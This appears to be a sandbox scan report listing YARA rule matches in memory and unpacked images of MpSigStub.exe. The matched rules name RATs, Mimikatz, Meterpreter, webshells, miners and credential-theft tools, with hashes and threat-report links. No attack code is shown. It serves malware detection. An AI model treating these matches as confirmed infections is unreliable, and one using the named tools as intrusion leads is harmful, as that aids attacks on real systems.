Source: 36.3.MpSigStub.exe.197a3d9206c.229.raw.unpack, type: UNPACKEDPE Matched rule: GhostDragon_Gh0stRAT date = 2016-04-23, hash4 = b803381535ac24ce7c8fdcf6155566d208dfca63fd66ec71bbc6754233e251f5, hash3 = 6c7f8ba75889e0021c4616fcbee86ac06cd7f5e1e355e0cbfbbb5110c08bb6df, hash2 = 99ee5b764a5db1cb6b8a4f62605b5536487d9c35a28a23de8f9174659f65bcb2, hash1 = f9a669d22866cd041e2d520c5eb093188962bea8864fdfd0c0abb2b254e9f197, author = Florian Roth, description = Detects Gh0st RAT mentioned in Cylance\' Ghost Dragon Report, reference = https://blog.cylance.com/the-ghost-dragon, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a3d9206c.229.raw.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a357b147.154.unpack, type: UNPACKEDPE Matched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: 36.3.MpSigStub.exe.197a357b147.154.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_DShell_3 author = FireEye, description = This rule looks for strings specific to the D programming language in combination with sections of an integer array which contains the encoded payload found within DShell, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = cf752e9cd2eccbda5b8e4c29ab5554b6
Source: 36.3.MpSigStub.exe.197a357b147.154.unpack, type: UNPACKEDPE Matched rule: SUSP_Microsoft_7z_SFX_Combo date = 2018-09-16, hash1 = cce63f209ee4efb4f0419fb4bbb32326392b5ef85cfba80b5b42b861637f1ff1, author = Florian Roth, description = Detects a suspicious file that has a Microsoft copyright and is a 7z SFX, reference = Internal Research
Source: 36.3.MpSigStub.exe.197a36a8ae6.146.unpack, type: UNPACKEDPE Matched rule: IMPLANT_4_v5 date = 2017-02-10, author = US CERT, description = BlackEnergy / Voodoo Bear Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 36.3.MpSigStub.exe.197a46aeebe.14.unpack, type: UNPACKEDPE Matched rule: SUSP_RANSOMWARE_Indicator_Jul20 date = 2020-07-28, hash3 = 6cb9afff8166976bd62bb29b12ed617784d6e74b110afcf8955477573594f306, hash2 = 5e78475d10418c6938723f6cfefb89d5e9de61e45ecf374bb435c1c99dd4a473, author = Florian Roth, description = Detects ransomware indicator, reference = https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/, score = 52888b5f881f4941ae7a8f4d84de27fc502413861f96ee58ee560c09c11880d6
Source: 36.3.MpSigStub.exe.197a46aeebe.14.unpack, type: UNPACKEDPE Matched rule: malware_sakula_xorloop author = David Cannings, description = XOR loops from Sakula malware, md5 = fc6497fe708dbda9355139721b6181e7
Source: 36.3.MpSigStub.exe.197a46aeebe.14.unpack, type: UNPACKEDPE Matched rule: HackTool_Samples description = Hacktool, score =
Source: 36.3.MpSigStub.exe.197a46aeebe.14.unpack, type: UNPACKEDPE Matched rule: RAT_Sakula date = 2015-10-13, author = Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings, description = Detects Sakula v1.0 RAT, reference = http://blog.airbuscybersecurity.com/public/YFR/sakula_v1x.yara
Source: 36.3.MpSigStub.exe.197a46aeebe.14.unpack, type: UNPACKEDPE Matched rule: HackTool_MSIL_SharpHound_3 author = FireEye, description = The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = eeedc09570324767a3de8205f66a5295
Source: 36.3.MpSigStub.exe.197a46aeebe.14.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_SharpHound3 date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/BloodHoundAD/SharpHound3, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a46aeebe.14.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a46aeebe.14.unpack, type: UNPACKEDPE Matched rule: MirageStrings author = Seth Hardy, description = Mirage Identifying Strings, last_modified = 2014-06-25
Source: 36.3.MpSigStub.exe.197a3f84db6.208.unpack, type: UNPACKEDPE Matched rule: hacktool_macos_keylogger_logkext author = @mimeframe, description = LogKext is an open source keylogger for Mac OS X, a product of FSB software., reference = https://github.com/SlEePlEs5/logKext
Source: 36.3.MpSigStub.exe.197a3f84db6.208.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Strings date = 2016-06-08, author = Florian Roth, description = Detects Mimikatz strings, reference = not set, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a3f84db6.208.unpack, type: UNPACKEDPE Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file
Source: 36.3.MpSigStub.exe.197a3578ac5.153.unpack, type: UNPACKEDPE Matched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: 36.3.MpSigStub.exe.197a3578ac5.153.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_DShell_3 author = FireEye, description = This rule looks for strings specific to the D programming language in combination with sections of an integer array which contains the encoded payload found within DShell, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = cf752e9cd2eccbda5b8e4c29ab5554b6
Source: 36.3.MpSigStub.exe.197a3578ac5.153.unpack, type: UNPACKEDPE Matched rule: SUSP_Microsoft_7z_SFX_Combo date = 2018-09-16, hash1 = cce63f209ee4efb4f0419fb4bbb32326392b5ef85cfba80b5b42b861637f1ff1, author = Florian Roth, description = Detects a suspicious file that has a Microsoft copyright and is a 7z SFX, reference = Internal Research
Source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE Matched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/, score =
Source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE Matched rule: Base64_PS1_Shellcode date = 2018-11-14, author = Nick Carr, David Ledbetter, description = Detects Base64 encoded PS1 Shellcode, reference = https://twitter.com/ItsReallyNick/status/1062601684566843392, score =
Source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE Matched rule: SUSP_PowerShell_Caret_Obfuscation_2 date = 2019-07-20, author = Florian Roth, description = Detects powershell keyword obfuscated with carets, reference = Internal Research
Source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE Matched rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn author = USG, description = Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 7f8a867a8302fe58039a6db254d335ae
Source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE Matched rule: SUSP_Script_Obfuscation_Char_Concat date = 2018-10-04, hash1 = b30cc10e915a23c7273f0838297e0d2c9f4fc0ac1f56100eef6479c9d036c12b, author = Florian Roth, description = Detects strings found in sample from CN group repo leak in October 2018, reference = https://twitter.com/JaromirHorejsi/status/1047084277920411648
Source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE Matched rule: IMPLANT_4_v5 date = 2017-02-10, author = US CERT, description = BlackEnergy / Voodoo Bear Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE Matched rule: IMPLANT_5_v3 date = 2017-02-10, author = US CERT, description = XTunnel Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_GORAT_5 date = 2020-12-02, author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, modified = 2020-12-02, md5 = cdf58a48757010d9891c62940c439adb, a107850eb20a4bb3cc59dbd6861eaf0f
Source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE Matched rule: CredTheft_MSIL_ADPassHunt_2 author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 6efb58cf54d1bb45c057efcfbbd68a93
Source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE Matched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
Source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE Matched rule: Typical_Malware_String_Transforms date = 2016-07-31, author = Florian Roth, description = Detects typical strings in a reversed or otherwise modified form, reference = Internal Research, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 36.3.MpSigStub.exe.197a497a30f.132.unpack, type: UNPACKEDPE Matched rule: malware_red_leaves_memory author = David Cannings, description = Red Leaves C&C left in memory, use with Volatility / Rekall
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE Matched rule: MiniRAT_Gen_1 date = 2018-01-22, hash5 = 675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd, hash4 = ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790, hash3 = ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2, hash2 = b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d, hash1 = 091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b, author = Florian Roth, description = Detects Mini RAT malware, reference = https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE Matched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/, score =
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE Matched rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn author = USG, description = Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 7f8a867a8302fe58039a6db254d335ae
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE Matched rule: malware_sakula_xorloop author = David Cannings, description = XOR loops from Sakula malware, md5 = fc6497fe708dbda9355139721b6181e7
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE Matched rule: Amplia_Security_Tool description = Amplia Security Tool, score =
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE Matched rule: IMPLANT_4_v5 date = 2017-02-10, author = US CERT, description = BlackEnergy / Voodoo Bear Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE Matched rule: IMPLANT_5_v3 date = 2017-02-10, author = US CERT, description = XTunnel Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE Matched rule: RAT_Sakula date = 2015-10-13, author = Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings, description = Detects Sakula v1.0 RAT, reference = http://blog.airbuscybersecurity.com/public/YFR/sakula_v1x.yara
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_GORAT_5 date = 2020-12-02, author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, modified = 2020-12-02, md5 = cdf58a48757010d9891c62940c439adb, a107850eb20a4bb3cc59dbd6861eaf0f
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE Matched rule: HackTool_MSIL_SharpHound_3 author = FireEye, description = The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = eeedc09570324767a3de8205f66a5295
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE Matched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_CsharpAmsiBypass date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/WayneJLee/CsharpAmsiBypass, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_SharpHound3 date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/BloodHoundAD/SharpHound3, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 36.3.MpSigStub.exe.197a46f017a.26.unpack, type: UNPACKEDPE Matched rule: malware_red_leaves_memory author = David Cannings, description = Red Leaves C&C left in memory, use with Volatility / Rekall
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE Matched rule: MiniRAT_Gen_1 date = 2018-01-22, hash5 = 675c3d96070dc9a0e437f3e1b653b90dbc6700b0ec57379d4139e65f7d2799cd, hash4 = ed97719c008422925ae21ff34448a8c35ee270a428b0478e24669396761d0790, hash3 = ba4e063472a2559b4baa82d5272304a1cdae6968145c5ef221295c90e88458e2, hash2 = b6ac374f79860ae99736aaa190cce5922a969ab060d7ae367dbfa094bfe4777d, hash1 = 091ae8d5649c4e040d25550f2cdf7f1ddfc9c698e672318eb1ab6303aa1cf85b, author = Florian Roth, description = Detects Mini RAT malware, reference = https://www.eff.org/deeplinks/2018/01/dark-caracal-good-news-and-bad-news, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE Matched rule: HKTL_Meterpreter_inMemory date = 2020-06-29, author = netbiosX, Florian Roth, description = Detects Meterpreter in-memory, reference = https://www.reddit.com/r/purpleteamsec/comments/hjux11/meterpreter_memory_indicators_detection_tooling/, score =
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE Matched rule: ReflectiveLoader author = Florian Roth, description = Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, reference = Internal Research, score = 2017-07-17, modified = 2021-03-15, nodeepdive =
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE Matched rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn author = USG, description = Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, reference = https://www.us-cert.gov/ncas/alerts/TA17-117A, true_positive = 7f8a867a8302fe58039a6db254d335ae
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE Matched rule: malware_sakula_xorloop author = David Cannings, description = XOR loops from Sakula malware, md5 = fc6497fe708dbda9355139721b6181e7
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE Matched rule: Amplia_Security_Tool description = Amplia Security Tool, score =
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE Matched rule: IMPLANT_4_v5 date = 2017-02-10, author = US CERT, description = BlackEnergy / Voodoo Bear Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE Matched rule: IMPLANT_5_v3 date = 2017-02-10, author = US CERT, description = XTunnel Implant by APT28, reference = https://www.us-cert.gov/ncas/current-activity/2017/02/10/Enhanced-Analysis-GRIZZLY-STEPPE, score =
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE Matched rule: RAT_Sakula date = 2015-10-13, author = Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings, description = Detects Sakula v1.0 RAT, reference = http://blog.airbuscybersecurity.com/public/YFR/sakula_v1x.yara
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE Matched rule: Mimikatz_Memory_Rule_1 date = 12/22/2014, author = Florian Roth, description = Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = memory
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_GORAT_5 date = 2020-12-02, author = FireEye, reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, modified = 2020-12-02, md5 = cdf58a48757010d9891c62940c439adb, a107850eb20a4bb3cc59dbd6861eaf0f
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE Matched rule: APT_Backdoor_Win_GoRat_Memory author = FireEye, description = Identifies GoRat malware in memory based on strings., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = 3b926b5762e13ceec7ac3a61e85c93bb
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE Matched rule: HackTool_MSIL_SharpHound_3 author = FireEye, description = The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project., reference = https://www.fireeye.com/blog/products-and-services/2020/12/fireeye-shares-details-of-recent-cyber-attack-actions-to-protect-community.html, md5 = eeedc09570324767a3de8205f66a5295
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE Matched rule: Oilrig_IntelSecurityManager_macro date = 2018-01-19, author = Eyal Sela (slightly modified by Florian Roth), description = Detects OilRig malware, reference = Internal Research
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_CsharpAmsiBypass date = 2020-12-13, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/WayneJLee/CsharpAmsiBypass, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE Matched rule: HKTL_NET_GUID_SharpHound3 date = 2020-12-29, author = Arnim Rupp, description = Detects c# red/black-team tools via typelibguid, reference = https://github.com/BloodHoundAD/SharpHound3, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc
Source: 36.3.MpSigStub.exe.197a46f017a.58.unpack, type: UNPACKEDPE Matched rule: malware_red_leaves_memory author = David Cannings, description = Red Leaves C&C left in memory, use with Volatility / Rekall
Source: 00000024.00000003.6348926620.00000197A3621000.00000004.00000001.sdmp, type: MEMORY Matched rule: Tofu_Backdoor date = 2017-02-28, author = Cylance, description = Detects Tofu Trojan, reference = https://www.cylance.com/en_us/blog/the-deception-project-a-new-japanese-centric-threat.html
Source: 00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp, type: MEMORY Matched rule: ZxShell_Jul17 date = 2017-07-08, hash1 = 5d2a4cde9fa7c2fdbf39b2e2ffd23378d0c50701a3095d1e91e3cf922d7b0b16, author = Florian Roth, description = Detects a ZxShell - CN threat group, reference = https://blogs.rsa.com/cat-phishing/, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000024.00000003.6327269415.00000197A3790000.00000004.00000001.sdmp, type: MEMORY Matched rule: RemCom_RemoteCommandExecution date = 2017-12-28, author = Florian Roth, description = Detects strings from RemCom tool, reference = https://goo.gl/tezXZt, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_by_string_obfuscation date = 2021/01/09, author = Arnim Rupp, description = PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = e4a15637c90e8eabcbdc748366ae55996dbec926382220c423e754bd819d22bc
Source: 00000024.00000003.6334856272.00000197A372A000.00000004.00000001.sdmp, type: MEMORY Matched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b
Source: 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp, type: MEMORY Matched rule: clearlog date = 2017-06-02, hash1 = 14093ce6d0fe8ab60963771f48937c669103842a0400b8d97f829b33c420f7e3, author = Florian Roth, description = Detects Fireball malware - file clearlog.dll, reference = https://goo.gl/4pTkGQ, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6345862795.00000197A47E3000.00000004.00000001.sdmp, type: MEMORY Matched rule: Amplia_Security_Tool description = Amplia Security Tool, score =
Source: 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_asp_generic_eval_on_input date = 2021/01/07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function directly on user input, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 069ea990d32fc980939fffdf1aed77384bf7806bc57c0a7faaff33bd1a3447f6
Source: 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://minergate.com/faq/what-pool-address
Source: 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp, type: MEMORY Matched rule: APT_DeputyDog_Fexel author = ThreatConnect Intelligence Research Team
Source: 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_dynamic_big date = 2021/02/07, author = Arnim Rupp, description = PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score =
Source: 00000024.00000003.6416783153.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY Matched rule: webshell_php_gzinflated date = 2021/01/12, author = Arnim Rupp, description = PHP webshell which directly eval()s obfuscated string, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 49e5bc75a1ec36beeff4fbaeb16b322b08cf192d
Source: 00000024.00000003.6416783153.00000197A3D91000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000024.00000003.6301822800.00000197A4E6B000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp, type: MEMORY Matched rule: Hacktool_Strings_p0wnedShell date = 2017-01-14, hash1 = e1f35310192416cd79e60dba0521fc6eb107f3e65741c344832c46e9b4085e60, author = Florian Roth, description = p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, reference = https://github.com/Cn33liz/p0wnedShell, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
